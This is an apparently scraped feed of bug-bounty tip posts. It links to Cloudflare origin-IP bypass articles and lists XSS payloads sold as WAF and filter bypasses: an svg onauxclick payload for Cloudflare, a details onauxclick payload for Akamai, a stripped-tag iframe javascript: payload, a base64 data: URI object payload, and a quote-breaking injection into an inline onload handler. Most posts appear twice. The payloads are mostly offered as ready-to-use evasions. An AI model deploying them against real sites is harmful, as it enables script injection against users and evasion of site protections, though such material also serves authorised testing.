cloudflare bypass material
https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/
http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html
http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html
https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510
#web
#pentest
#bypass
#sqli
#xss
@sec_nerd_en
https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/
http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html
http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html
https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510
#web
#pentest
#bypass
#sqli
#xss
@sec_nerd_en
Christophe Tafani-Dereeper
CloudFlair: Bypassing Cloudflare using Internet-wide scan data - Christophe Tafani-Dereeper
Cloudflare is a service that acts as a middleman between a website and its end users, protecting it from various attacks. Unfortunately, those websites are often poorly configured, allowing an attacker to entirely bypass Cloudflare and run DDoS attacks or…
Cloudflare XSS Bypass Payload
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare #bugbounty #bugbountytips #WAF #Xss
<svg%0Aonauxclick=0;[1].some(confirm)//
#Cloudflare #bugbounty #bugbountytips #WAF #Xss
Akamai WAF XSS Payload:
<details onauxclick=confirm`xss`></details>
Right-Click on 'Details', XSS will be fired.
#bugbountytips #bugbounty #xss
<details onauxclick=confirm`xss`></details>
Right-Click on 'Details', XSS will be fired.
#bugbountytips #bugbounty #xss
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.
XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty
Payload xss en aplicación de javascript.
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
#XSS on twitter
https://medium.com/bugbountywriteup/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
15.9k views
-
XSS on a big bank's payment gateway
https://medium.com/bugbountywriteup/cross-site-scripting-on-a-big-banks-payment-gateway-a986a2ba5d7
5.7k views
-
why i am banned from hackerone
https://medium.com/@kenanistaken/why-im-banned-from-hackerone-a6d8cffe2286
6.1k views
-
Sop Bypass
https://medium.com/bugbountywriteup/sop-bypass-ecae7f4a5c00
https://medium.com/bugbountywriteup/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5
15.9k views
-
XSS on a big bank's payment gateway
https://medium.com/bugbountywriteup/cross-site-scripting-on-a-big-banks-payment-gateway-a986a2ba5d7
5.7k views
-
why i am banned from hackerone
https://medium.com/@kenanistaken/why-im-banned-from-hackerone-a6d8cffe2286
6.1k views
-
Sop Bypass
https://medium.com/bugbountywriteup/sop-bypass-ecae7f4a5c00
Medium
Making an XSS triggered by CSP bypass on Twitter.
Hi there,
quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params
Normal:
/page?x=1&y=2&z=3
Downwards arrow
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow
<body onload="func('1', '\', ');alert(1);//'">
Normal:
/page?x=1&y=2&z=3
Downwards arrow
<body onload="func('1', '2', '3')">
XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow
<body onload="func('1', '\', ');alert(1);//'">
please note and share;
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking